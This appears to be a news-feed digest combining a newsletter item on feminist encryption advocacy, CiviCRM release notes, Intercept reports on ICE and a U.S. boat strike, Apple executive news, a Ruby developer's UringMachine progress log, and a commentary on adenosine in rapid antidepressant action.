A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.
By Audrey Hingle
Our MozFest session on
Encryption and Feminism: Reimagining Child Safety Without Surveillance
was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.
In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s
“part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!”
Another participant said they left ready to
“be a champion of encryption to protect all.”
Someone else named what many feel:
“More feminist spaces are needed!”
It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.
We also heard calls for clarity and practicality: reduce jargon, show people what encryption actually does, and push more broadly for privacy-preserving features like screenshot protection and sender-controlled forwarding.
Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.
And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions.
“Normalize the ability to have tricky conversations in movement spaces,”
someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.
So let’s keep going.
New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance
🗓️ Feb 10, 4PM GMT,
Online
Whether you joined us at MozFest, couldn’t make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.
Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.
We hope you’ll join us!
Related
: If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through
a short survey
asking for input on what features matter most for those in at-risk contexts.
New book from IX client
Dr. Luca Belli
looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.
Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.
Support the Internet Exchange
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always
leave us a tip
.
Last week’s Franco-German Summit on European Digital Sovereignty set the stage for Eurosky, part of the Free Our Feeds initiative, which is building public-interest social media infrastructure on the Bluesky-backed ATProtocol to reduce Europe’s tech dependencies and create real alternatives to today’s centralized platforms.
https://openfuture.eu/blog/eurosky-dawns-building-infrastructure-for-sovereign-social-media
Internet Governance
The Seoul Statement is a joint declaration issued at the International AI Standards Summit by the three major international standards bodies: ISO, IEC, and ITU. It outlines their shared commitments to developing inclusive, human-rights-aware, globally interoperable standards for AI.
https://www.aistandardssummit.org/event/354f4a77-ee25-47e3-8e84-291a55519c0c/seoul-statement
At the November 2025 TPAC event, François Daoust presented the Process 2025, which simplifies W3C’s standardization process by removing the Proposed Recommendation stage.
https://www.youtube.com/watch?v=KtXCtlAp9OU
Add Surveillance News to your RSS reader to get the latest about state surveillance and threats facing social movements.
https://activistchecklist.org/news
In the new report
Bubble or Nothing
, Advait Arun examines whether the current AI-driven data center boom is economically sustainable—or whether it’s vulnerable to collapse if the tech sector cools.
https://publicenterprise.org/report/bubble-or-nothing
In the latest episode of Occupied Tech, Tech For Palestine’s Paul Biggar is joined by Adil Abbuthalha, entrepreneur and creator of BoyCat — an innovative app empowering consumers to make ethical shopping choices and support the boycott movement against Israel.
https://www.youtube.com/watch?v=2MJ1CyJKTXg
Tramas is a research-action project of the Coalición Feminista Decolonial por la Justicia Digital y Ambiental. Through cases and testimonies of resistance in several Latin American countries, they seek to unravel the complexity of contemporary digital extractivism processes.
https://tramas.digital
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the
monthly release notes
.
You are encouraged to upgrade now for the most stable, secure CiviCRM experience:
CiviCRM is community driven and is sustained through code contributions and generous financial support.
We are committed to keeping CiviCRM free and open,
forever
. We depend on your support to help make that happen. Please consider
supporting CiviCRM today
.
AGH Strategies
- Alice Frumin;
Agileware Pty
Ltd - Iris, Justin Freeman; akwizgran;
ALL IN APPLI
- Guillaume Sorel;
Artful Robot
- Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina;
Circle Interactive
- Dave Jenkins, Rhiannon Davies;
CiviCoop
- Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W;
civiservice.de
- Gerhard Weber; CompuCo - Muhammad Shahrukh;
Coop SymbioTIC
- Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D;
DevApp
- David Cativo; Duncan Stanley White;
Freeform Solutions
- Herb van den Dool;
Fuzion
- Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel;
INOEDE Consulting
- Nadaillac; JacquesVanH;
JMA Consulting
- Seamus Lee;
Joinery
- Allen Shaw; Lemniscus - Noah Miller;
Makoa
- Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg;
MJW Consulting
- Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz;
Progressive Technology Project
- Jamie McClelland; Richard Baugh;
Skvare
- Sunil Pawar; Sarah Farrell-Graham;
Squiffle Consulting
- Aidan Saunders;
Tadpole Collective
- Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green
New Extensions
Membership AJAX Permissions
- This CiviCRM extension modifies the API permissions to allow it to be called with just the "Access AJAX API" permission instead of requiring the more restrictive default permissions.
civiglific
- Integrates Glific (
https://glific.org
) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video
Intercept
theintercept.com
2025-12-06 00:19:09
Heavily armed tactical teams fired crowd suppression munitions at the Arizona lawmaker and protesters, claiming she was leading “a mob.”
Federal immigration agents
pepper-sprayed and shot crowd suppression munitions at newly sworn-in Arizona Rep. Adelita Grijalva during a confrontation with protesters in Tucson on Friday.
A
video
Grijalva posted online shows an agent in green fatigues indiscriminately dousing a line of several people — Grijalva included — with pepper spray outside a popular taco restaurant.
“You guys need to calm down and get out,” Grijalva says, coughing amid a cloud of spray. In another clip, an agent fires a pepper ball at Grijalva’s feet.
Department of Homeland Security assistant secretary Tricia McLaughlin denied that Grijalva was pepper-sprayed in a statement, saying that if her claims were true, “this would be a medical marvel. But they’re not true. She wasn’t pepper sprayed.”
“She was in the vicinity of someone who *was* pepper sprayed as they were obstructing and assaulting law enforcement,” McLaughlin continued. The comment suggested a lack of understanding as to how pepper spray works. Fired from a distance, pepper-spray canisters create a choking cloud that will affect anyone in the vicinity, as Grijalva’s video showed.
In a
separate video
Grijalva posted to Facebook, the Democratic representative from Southern Arizona described community members confronting approximately 40 Immigration and Customs Enforcement agents in several vehicles.
“I was here, this is like the restaurant I come to literally once a week,” she said, “and was sprayed in the face by a very aggressive agent, pushed around by others.” Grijalva maintained that she was not being aggressive. “I was asking for clarification,” she said. “Which is my right as a member of Congress.”
Video
from journalists on the ground shows dozens of heavily armed agents — members of ICE’s high-powered Homeland Security Investigations wing and the Department of Homeland Security’s SWAT-style Special Response teams — deploying flash-bang grenades, tear gas, and pepper-ball rounds at a crowd of immigrant rights protesters near Taco Giro, a popular mom-and-pop restaurant in west Tucson.
According to McLaughlin, two “law enforcement officers were seriously injured by this mob that Rep. Adelita Grijalva joined.” She provided no evidence or details for the claim.
“Presenting one’s self as a ‘Member of Congress’ doesn’t give you the right to obstruct law enforcement,” McLaughlin wrote. The DHS press secretary did not respond to a question about the munitions fired at Grijalva’s feet.
Grijalva “was doing her job, standing up for her community,” Sen. Ruben Gallego, D-Ariz., said in
a social media
post Friday. “Pepper-spraying a sitting member of Congress is disgraceful, unacceptable, and absolutely not what we voted for. Period.”
Additional
footage
from Friday’s scene shows Grijalva and members of the media face-to-face with several heavily armed, uniformed Homeland Security Investigation agents as they loaded at least two people — both with their hands zip-tied behind their backs — into a large gray van.
Grijalva identifies herself as a member of Congress and asks where they are being taken. One of the masked agents initially replies, “I can’t verify that.” Another pushes the congresswoman and others back with his forearm. “Don’t push me,” Grijalva says multiple times. A third masked agent steps in front of the Arizona lawmaker, makes a comment about “assaulting a federal officer,” and then says the people taken into custody would be transferred to “federal jail.”
“We saw people directly sprayed, members of our press, everybody that was with me, my staff member, myself,” Grijalva said in her video report from Friday’s chaotic scene. She described the events as the latest example of a Trump administration that is flagrantly flouting the rule of law, due process, and the Constitution.
“They’re literally disappearing people from the streets,” she said. “I can just only imagine how if they’re going to treat me like that, how they’re treating other people.”
The violence Grijalva experienced Friday marked the latest chapter in what has been a dramatic year for Arizona’s first Latina representative.
Grijalva won a special election in Arizona’s 7th Congressional District earlier this year to replace her father, Raúl Grijalva, a towering progressive figure in the state who represented Tucson for more than 20 years before passing away in March.
Republican Speaker of the House Mike Johnson delayed the younger Grijalva’s swearing in for nearly two months amid the longest
government shutdown
in history. Grijalva would add the deciding signature on a discharge petition to release
files
related to convicted sex trafficker Jeffrey Epstein, which she signed immediately after taking office.
Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them
Intercept
theintercept.com
2025-12-06 00:07:45
“There are a lot of disturbing aspects. But this is one of the most disturbing.”
Two survivors clung
to the wreckage of a vessel attacked by the U.S. military for roughly 45 minutes before a second strike killed them on September 2. After about three quarters of an hour, Adm. Frank Bradley, then head of Joint Special Operations Command, ordered a follow-up strike —
first reported
by The Intercept in September — that killed the shipwrecked men, according to three government sources and a senior lawmaker.
Two more missiles followed that finally sank the foundering vessel. Bradley, now the chief of Special Operations Command, claimed that he conducted multiple strikes because the shipwrecked men and the fragment of the boat still posed a threat, according to the sources.
Secretary of War Pete Hegseth distanced himself from the follow-up strike during a Cabinet meeting at the White House,
telling reporters
he “didn’t personally see survivors” amid the fire and smoke and had left the room before the second attack was ordered. He evoked the “fog of war” to justify the decision for more strikes on the sinking ship and survivors.
Rep. Adam Smith, D-Wash., the ranking member of the House Armed Services Committee, said Hegseth provided misleading information and that the video shared with lawmakers Thursday showed the reality in stark light.
“We had video for 48 minutes of two guys hanging off the side of a boat. There was plenty of time to make a clear and sober analysis,” Smith
told CNN
on Thursday. “You had two shipwrecked people on the top of the tiny little bit of the boat that was left that was capsized. They weren’t signaling to anybody. And the idea that these two were going to be able to return to the fight — even if you accept all of the questionable legal premises around this mission, around these strikes — it’s still very hard to imagine how these two were returning to any sort of fight in that condition.”
Three other sources familiar with briefings by Bradley provided to members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees on Thursday confirmed that roughly 45 minutes elapsed between the first and second strikes. “They had at least 35 minutes of clear visual on these guys after the smoke of the first strike cleared. There were no time constraints. There was no pressure. They were in the middle of the ocean and there were no other vessels in the area,” said one of the sources. “There are a lot of disturbing aspects. But this is one of the most disturbing. We could not understand the logic behind it.”
The three sources said that after the first strike by U.S. forces, the two men climbed aboard a small portion of the capsized boat. At some point the men began waving to something overhead, which three people familiar with the briefing said logically must have been U.S. aircraft flying above them. All three interpreted the actions of the men as signaling for help, rescue, or surrender.
“They were seen waving their arms towards the sky,” said one of the sources. “One can only assume that they saw the aircraft. Obviously, we don’t know what they were saying or thinking, but any reasonable person would assume that they saw the aircraft and were signaling either: don’t shoot or help us. But that’s not how Bradley saw it.”
Special Operations Command did not reply to questions from The Intercept prior to publication.
During the Thursday briefings, Bradley claimed that he believed there was cocaine in the quarter of the boat that remained afloat, according to the sources. He said the survivors could have drifted to land or to a rendezvous point with another vessel, meaning that the alleged drug traffickers still had the ability to transport a deadly weapon — cocaine — into the United States, according to one source. Bradley also claimed that without a follow-up attack, the men might rejoin “the fight,” another source said.
Sen. Tom Cotton, R-Ark., echoed that premise, telling reporters after the briefings that the additional strikes on the vessel were warranted because the shipwrecked men were “trying to flip a boat, loaded with drugs bound for the United States, back over so they could stay in the fight.”
None of the three sources who spoke to The Intercept said there was any evidence of this. “They weren’t radioing anybody and they certainly did not try to flip the boat. [Cotton’s] comments are untethered from reality,” said one of the sources.
Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, said that the people in the boat weren’t in any fight to begin with. “They didn’t pose an imminent threat to U.S. forces or the lives of others. There was no lawful justification to kill them in the first place let alone the second strike,” she told The Intercept. “The only allegation was that the men were transporting drugs, a crime that doesn’t even carry the death penalty.”
The Justice Department’s Office of Legal Counsel this summer produced a
classified opinion
intended to shield service members up and down the chain of command from prosecution. The legal theory advanced in the finding claims that narcotics on the boats are lawful military targets because their cargo generates revenue, which can be used to buy weaponry, for cartels that the Trump administration claims are in armed conflict with the U.S.
The Trump administration claims that at least 24
designated terrorist organizations
are engaged in “non-international armed conflict” with the United States including the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S.
claims
is “headed by Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel.
The military has carried out 22 known attacks, destroying 23 boats in the Caribbean Sea and eastern Pacific Ocean since September,
killing at least 87 civilians
. The most recent attack occurred in the Pacific Ocean on Thursday and killed four people.
Since the attacks began, experts in the laws of war and members of Congress,
from both parties
, have said the strikes are illegal
extrajudicial killings
because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.
Dithering: ‘Alan Dye Leaves Apple’
Daring Fireball
dithering.passport.online
2025-12-05 23:25:09
Dithering is my and Ben Thompson’s twice-a-week podcast — 15 minutes per episode, not a minute less, not a minute more. It’s a $7/month or $70/year subscription, and included in the Stratechery Plus bundle (a bargain). This year our CMS (Passport — check it out) gained a feature that lets us ma...
Aaron Tilley and Wayne Ma, in a piece headlined “Why Silicon Valley is Buzzing About Apple CEO Succession” at the paywalled-up-the-wazoo The Information:
Prediction site Polymarket places Ternus’ odds of getting the
job at nearly 55%, ahead of other current Apple executives
such as software head...
Lisa Jackson on The Talk Show Back in 2017
Daring Fireball
daringfireball.net
2025-12-05 22:37:35
This interview was both interesting and a lot of fun. Worth a listen or re-listen.
★
...
Special guest Lisa Jackson — Apple’s vice president of Environment, Policy, and Social Initiatives — joins the show for an Earth Day discussion of the state of Apple’s environmental efforts: climate change, renewable energy, responsible packaging, and Apple’s new goal to create a “closed-loop supply chain”, wherein the company’s products would be manufactured entirely from recycled materials.
Apple Newsroom, yesterday:
Apple today announced that Jennifer Newstead will become Apple’s
general counsel on March 1, 2026, following a transition of duties
from Kate Adams, who has served as Apple’s general counsel since
2017. She will join Apple as senior vice president in January,
reporting...
Jennifer Newstead to join Apple as senior vice president, will become general counsel in March 2026
Kate Adams to retire late next year
Lisa Jackson to retire
CUPERTINO, CALIFORNIA
Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting to CEO Tim Cook and serving on Apple’s executive team.
In addition, Lisa Jackson, vice president for Environment, Policy, and Social Initiatives, will retire in late January 2026. The Government Affairs organization will transition to Adams, who will oversee the team until her retirement late next year, after which it will be led by Newstead. Newstead’s title will become senior vice president, General Counsel and Government Affairs, reflecting the combining of the two organizations. The Environment and Social Initiatives teams will report to Apple chief operating officer Sabih Khan.
“Kate has been an integral part of the company for the better part of a decade, having provided critical advice while always advocating on behalf of our customers’ right to privacy and protecting Apple’s right to innovate,” said Tim Cook, Apple’s CEO. “I am incredibly grateful to her for the leadership she has provided, for her remarkable determination across a myriad of highly complex issues, and above all, for her thoughtfulness, her deeply strategic mind, and her sound counsel.”
“I am deeply appreciative of Lisa’s contributions. She has been instrumental in helping us reduce our global greenhouse emissions by more than 60 percent compared to 2015 levels,” said Cook. “She has also been a critical strategic partner in engaging governments around the world, advocating for the best interests of our users on a myriad of topics, as well as advancing our values, from education and accessibility to privacy and security.”
“We couldn’t be more pleased to have Jennifer join our team,” said Cook. “She brings an extraordinary depth of experience and skill to the role, and will advance Apple’s important work all over the world. We are also pleased that Jennifer will be overseeing both the Legal and Government Affairs organizations, given the increasing overlap between the work of both teams and her substantial background in international affairs. I know she will be an excellent leader going forward.”
“I have long admired Apple’s deep focus on innovation and strong commitment to its values, its customers, and to making the world a better place,” said Newstead. “I am honored to join the company and to lead an extraordinary team who are dedicated each and every day to doing what’s in the best interest of Apple’s users.”
“It has been one of the great privileges of my life to be a part of Apple, where our work has always been about standing up for the values that are the foundation of this great company,” said Adams. “I am proud of the good our wonderful team has done over the past eight years, and I am filled with gratitude for the chance to have made a difference. Jennifer is an exceptional talent and I am confident that I am leaving the team in the very best hands, and I’m really looking forward to working more closely with the Government Affairs team.”
“Apple is a remarkable company and it has been a true honor to lead such important work here,” said Jackson. “I have been lucky to work with leaders who understand that reducing our environmental impact is not just good for the environment, but good for business, and that we can do well by doing good. And I am incredibly grateful to the teams I’ve had the privilege to lead at Apple, for the innovations they’ve helped create and inspire, and for the advocacy they’ve led on behalf of our users with governments around the world. I have every confidence that Apple will continue to have a profoundly positive impact on the planet and its people.”
Newstead was most recently chief legal officer at Meta and previously served as the legal adviser of the U.S. Department of State, where she led the legal team responsible for advising the Secretary of State on legal issues affecting the conduct of U.S. foreign relations. She held a range of other positions in government earlier in her career as well, including as general counsel of the White House Office of Management and Budget, as a principal deputy assistant attorney general of the Office of Legal Policy at the Department of Justice, as associate White House counsel, and as a law clerk to Justice Stephen Breyer of the U.S. Supreme Court. She also spent a dozen years as partner at Davis Polk & Wardwell LLP, where she advised global corporations on a wide variety of issues. Newstead holds an AB from Harvard University and a JD from Yale Law School.
I’m currently doing grant work for the Japanese Ruby Association on UringMachine, a new Ruby gem that provides a low-level API for working with io_uring. As part of my work I’ll be providing weekly updates on this website. Here’s what I did this week:
Last week I wrote about the work I did under the guidance of Samuel Williams to improve the behavior of fiber schedulers when forking. After discussing the issues around forking with Samuel, we decided that the best course of action would be to remove the fiber scheduler after a fork. Samuel did work around cleaning up schedulers in threads that terminate on fork, and I submitted a PR for removing the scheduler from the active thread on fork, as well as resetting the fiber to blocking mode. This is my first contribution to Ruby core!
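As a rough sketch of the user-visible behavior this change aims for (the scheduler class name below is a placeholder, not an actual UringMachine class, and the expected output reflects the PR’s description rather than verified behavior):

Fiber.set_scheduler(SomeScheduler.new)  # placeholder scheduler implementing the hooks

pid = fork do
  # Expected after the change: the child has no active scheduler and its
  # current fiber is back in blocking mode.
  puts Fiber.scheduler.nil?  # => true
end
Process.wait(pid)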
I continued implementing the missing fiber scheduler hooks: #fiber_interrupt, #address_resolve, #timeout_after. For the most part, they were simple to implement. I probably spent most of my time figuring out how to test these, rather than implementing them. Most of the hooks involve just a few lines of code, with many of them consisting of a single line of code calling into the relevant UringMachine low-level API.
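As an illustration of how thin such a hook can be, here is a sketch of an #address_resolve implementation using only the standard library; the real UringMachine scheduler delegates to its own low-level primitives instead, so this is not its actual code:

require 'socket'

class SketchScheduler
  # #address_resolve receives a hostname and should return an array of
  # address strings; a portable fallback simply asks Addrinfo.
  def address_resolve(hostname)
    Addrinfo.getaddrinfo(hostname, nil).map(&:ip_address).uniq
  end
end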
Implemented the #io_select hook, which involved implementing a low-level UM#select method. This method took some effort to implement, since it needs to handle an arbitrary number of file descriptors to check for readiness. We need to create a separate SQE for each fd we want to poll. When one or more CQEs arrive for polled fds, we also need to cancel all poll operations that have not completed.
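The hook itself has a simple shape. Below is a pure-Ruby fallback sketch; the actual UringMachine implementation instead submits the poll SQEs and handles cancellation inside UM#select, so this only shows where the hook plugs in:

# Fallback sketch of the #io_select hook: run the blocking call off the
# event loop so other fibers keep making progress.
def io_select(readables, writables, exceptables, timeout)
  Thread.new { IO.select(readables, writables, exceptables, timeout) }.value
end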
Since in many cases IO.select is called with just a single IO, I also added a special-case implementation of UM#select that specifically handles a single fd.
Implemented a worker pool for performing blocking operations in the scheduler. Up until now, each scheduler started its own worker thread for performing blocking operations for use in the #blocking_operation_wait hook. The new implementation uses a worker thread pool shared by all schedulers, with the worker count limited to the CPU count. Workers are started when needed.
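A minimal sketch of such a shared pool in plain Ruby (illustrative only; the names and structure are assumptions, not UringMachine’s actual implementation):

require 'etc'

# Jobs go onto a single shared queue; worker threads are started lazily,
# one per submission, until the CPU-count cap is reached.
class BlockingOpPool
  def initialize(max_workers = Etc.nprocessors)
    @jobs = Queue.new
    @workers = []
    @max_workers = max_workers
    @lock = Mutex.new
  end

  # Run the block on a worker thread. Returns a Queue the caller pops to
  # wait for the result (a scheduler would park the calling fiber here).
  def submit(&block)
    start_worker_if_needed
    result = Queue.new
    @jobs << [block, result]
    result
  end

  private

  def start_worker_if_needed
    @lock.synchronize do
      return if @workers.size >= @max_workers
      @workers << Thread.new do
        loop do
          block, result = @jobs.pop
          result << block.call
        end
      end
    end
  end
end

A scheduler’s #blocking_operation_wait hook could then submit the work and block the current fiber until the result queue yields a value.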
I also added an optional entries argument to set the SQE and CQE buffer sizes when starting a new UringMachine instance. The default size is 4096 SQE entries (liburing by default makes the CQE buffer size double that of the SQE buffer). The blocking operations worker threads specify a value of 4, since they only use their UringMachine instance for popping jobs off the job queue and pushing the blocking operation result back to the scheduler.
Added support for a file_offset argument in UM#read and UM#write in preparation for implementing the #io_pread and #io_pwrite hooks. The UM#write_async API, which permits writing to a file descriptor without waiting for the operation to complete, got support for specifying length and file_offset arguments as well. In addition, UM#write and UM#write_async got short-circuit logic for writes with a length of 0.
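For context, these hooks back Ruby’s positional I/O methods, which read and write at an explicit offset without moving the file position. A quick illustration of the semantics the hooks need to preserve:

require 'tempfile'

Tempfile.create('demo') do |f|
  f.write('hello world')
  f.flush

  # Positional read: length first, then offset; the file position is untouched.
  p f.pread(5, 6)   # => "world"

  # Positional write: string first, then offset.
  f.pwrite('WORLD', 6)
  p f.pread(11, 0)  # => "hello WORLD"
end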
Added support for specifying a buffer offset in the #io_read and #io_write hooks, and support for timeouts in the #block, #io_read and #io_write hooks.
I found and fixed a problem with how futex_wake was done in the low-level UringMachine code handling mutexes and queues. This fixed a deadlock in the scheduler background worker pool where clients of the pool were not properly woken after the submitted operation was done.
I finished work on the #io_pread and #io_pwrite hooks. Unfortunately, the test for #io_pwrite consistently hangs (not in IO#pwrite itself, but rather on closing the file). With Samuel’s help, hopefully we’ll find a solution…
With those two last hooks, the fiber scheduler implementation is now feature complete!
Why is The Fiber Scheduler Important?
I think there is some misunderstanding around the Ruby fiber scheduler
interface. This is the only Ruby API that does not have a built-in
implementation in Ruby itself, but rather requires an external library or gem.
The question has been raised lately on Reddit: why doesn’t Ruby include an “official” implementation of the fiber scheduler?
I guess Samuel is really the person to ask this, but personally I would say this
is really about experimentation, and seeing how far we can take the idea of a
pluggable I/O implementation. Also, the open-ended design of this interface
means that we can use a low-level API such as UringMachine to implement it.
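For readers less familiar with the interface, the pluggability looks like this in practice; the scheduler class name below is a placeholder for whichever implementation you load (UringMachine’s, async’s, or another):

require 'net/http'

Fiber.set_scheduler(SomeScheduler.new)  # placeholder: any object implementing the hooks

3.times do |i|
  # Each block runs in its own non-blocking fiber; blocking calls inside it
  # (sockets, DNS, sleep) are routed through the scheduler's hooks.
  Fiber.schedule do
    Net::HTTP.get(URI("https://example.com/?page=#{i}"))
  end
end
# Pending fibers are driven to completion when the main fiber finishes.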
What’s Coming Next Week?
Now that the fiber scheduler is feature complete, I’m looking to make it as
robust as possible. For this, I intend to add a lot of tests. Right now, the
fiber scheduler has 25 tests with 77 assertions, in about 560LOC (the fiber
scheduler itself is at around 220LOC). To me this is not enough, so next week
I’m going to add tests for the following:
IO - tests for all IO instance methods.
working with queues: multiple concurrent readers / writers.
net/http test: ad-hoc HTTP/1.1 server + Net::HTTP client.
sockets: echo server + many clients (a rough sketch of the shape of such a test follows below).
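Here is that sketch (the scheduler class is a placeholder and the test itself is illustrative, not part of the actual suite):

require 'socket'
require 'minitest/autorun'

class TestEchoUnderScheduler < Minitest::Test
  def test_echo_roundtrip
    replies = Queue.new

    Thread.new do
      Fiber.set_scheduler(SomeScheduler.new)  # placeholder scheduler

      server = TCPServer.new('127.0.0.1', 0)
      port = server.addr[1]

      # Server fiber: accept one connection and echo what it receives.
      Fiber.schedule do
        conn = server.accept
        conn.write(conn.readpartial(1024))
        conn.close
      end

      # Client fiber: connect, send a message, collect the echo.
      Fiber.schedule do
        sock = TCPSocket.new('127.0.0.1', port)
        sock.write('hello')
        replies << sock.readpartial(1024)
        sock.close
      end
    end.join  # pending fibers run to completion before the thread exits

    assert_equal 'hello', replies.pop
  end
end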
In conjunction with all those tests, I’ll also start working on benchmarks for
measuring the performance of the UringMachine low-level API against the
UringMachine fiber scheduler and against the “normal” thread-based Ruby APIs.
In addition, I’m working on a pull request for adding an #io_close hook to the fiber scheduler interface in Ruby. Samuel already did some preparation for this, so I hope I can finish it in time to be merged before the release of Ruby 4.0.
I intend to release UringMachine 1.0 on Christmas, to mark the release of Ruby 4.0.
What About Papercraft?
This week I also managed to take the time to reflect on what I want to do next in Papercraft. I already wrote here about wanting to implement template inlining for Papercraft. I also wanted to rework how the compiled code is generated. I imagined a kind of DSL for code generation, but I didn’t really know what such a DSL would look like.
Then, a few days ago, the idea hit me. I had already played with this idea late last year, when I wrote Sirop, a sister gem to Papercraft that does a big part of the work of converting code into ASTs and vice versa. Here’s what I put in the readme:
Future directions: implement a macro expander with support for quote/unquote:
trace_macro = Sirop.macro do |ast|
  source = Sirop.to_source(ast)
  quote do
    result = unquote(ast)
    puts "The result of #{source} is: #{result}"
    result
  end
end
The example is trivial and contrived, but I suddenly understood how such an interface could be used to actually generate code in Papercraft. I wrote up an issue for this, and hopefully I’ll have some time to work on it in January.
Adenosine on the common path of rapid antidepressant action: The coffee paradox
As Claude Bernard understood in laying the foundations of experimental medicine, each scientific generation brings us closer to mechanistic truth, yet complete understanding remains elusive (1). This has been particularly evident in psychiatric therapeutics, where chance preceded knowledge for a long time. For over twenty years now, we have had evidence suggesting that ketamine is a rapid antidepressant. We knew the electrically charged scalpel of electroconvulsive therapy worked when nothing else did. And we had long suspected that depriving people of sleep benefited them in a transient way. All we were lacking was the mechanistic thread connecting these varied interventions, the common path that might allow for rational, rather than empirical, therapeutic development.
In a study that demonstrates what modern neuroscience can do when technical virtuosity meets conceptual clarity, Yue and colleagues, led by Professor Min-Min Luo, now provide that thread (2). Using genetically encoded adenosine sensors, a comprehensive genetic and pharmacological dissection, and immediate therapeutic translation, they show that adenosine signalling is the convergent mechanism of rapid-acting antidepressant therapies. It is a new way of thinking about treatment-resistant depression, not just an incremental advance.
The technical achievement
The precise timing is what gives the work its compelling quality. The authors applied GRABAdo1.0, a GPCR-based sensor for adenosine, to monitor adenosine changes in mood-regulating circuits in real time (2). Injection of ketamine (10 mg/kg) and application of electroconvulsive therapy produced a substantial spike in extracellular adenosine in the medial prefrontal cortex and hippocampus, with peak amplitudes of ∼15% ΔF/F reached within ∼500 s and sustained above baseline for about 30 minutes (Extended Data Fig. 1d–h in ref. 2). The regional specificity is also telling. While adenosine increases occurred in the mPFC and hippocampus, no surge occurred in the nucleus accumbens, pointing to affective rather than reward circuits.
Figure 1.
Adenosine Signaling: Convergent Mechanisms for Rapid Antidepressants. Three distinct interventions—ketamine (pharmacological), electroconvulsive therapy/ECT (electrical), and acute intermittent hypoxia/aIH (physiological)—converge on a common mechanism: adenosine surges in the medial prefrontal cortex (mPFC). Ketamine triggers adenosine release through metabolic modulation (decreased ATP/ADP ratio) and ENT1/2-mediated efflux, without causing neuronal hyperactivity. ECT produces adenosine surges via neuronal hyperactivity and rapid metabolic demand. aIH generates adenosine through controlled hypoxia in a non-invasive manner. All three interventions activate A1 and A2A adenosine receptors in the mPFC, detected in real-time using fiber photometry with genetically encoded sensors (GRABAdo1.0). This adenosine signaling triggers downstream synaptic plasticity mechanisms (BDNF upregulation, mTOR activation, neuroplasticity), resulting in rapid antidepressant effects with onset in hours and duration lasting days. Clinical Considerations: The adenosine mechanism raises important questions about caffeine consumption patterns.
Tonic signaling
(chronic/baseline coffee consumption) appears protective against depression and may help prevent depressive episodes.
Phasic signaling
(acute pre-treatment coffee) raises mechanistic concerns about potential interference with the adenosine surge during ketamine/ECT administration, though this remains speculative and requires clinical validation. The dual nature of caffeine's effects—protective chronically, potentially interfering acutely—reflects the distinction between tonic baseline adenosine receptor modulation and phasic adenosine surge responses to rapid-acting treatments.
